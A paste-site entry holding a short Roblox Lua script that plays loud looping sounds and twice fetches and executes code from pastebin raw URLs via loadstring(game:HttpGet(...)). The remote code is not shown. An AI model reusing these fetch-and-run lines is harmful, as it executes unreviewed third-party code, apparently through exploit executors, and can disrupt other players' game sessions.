Untitled
unknown
plain_text
3 years ago
552 B
7
Indexable
wait(4.7)
local chime = Instance.new("Sound")
chime.Parent = workspace
chime.SoundId = "rbxassetid://743521450"
chime.Volume = 7
chime.Looped = true
chime:Play()
wait(0.1)
loadstring(game:HttpGet("https://pastebin.com/raw/qWQapPRK"))()
wait(34)
chime.Looped = false
wait(2.2)
local ghost = Instance.new("Sound")
ghost.Parent = workspace
ghost.SoundId = "rbxassetid://4537172300"
ghost.Volume = 9
ghost:Play()
loadstring(game:HttpGet("https://pastebin.com/raw/V1JMVcbz"))()Editor is loading...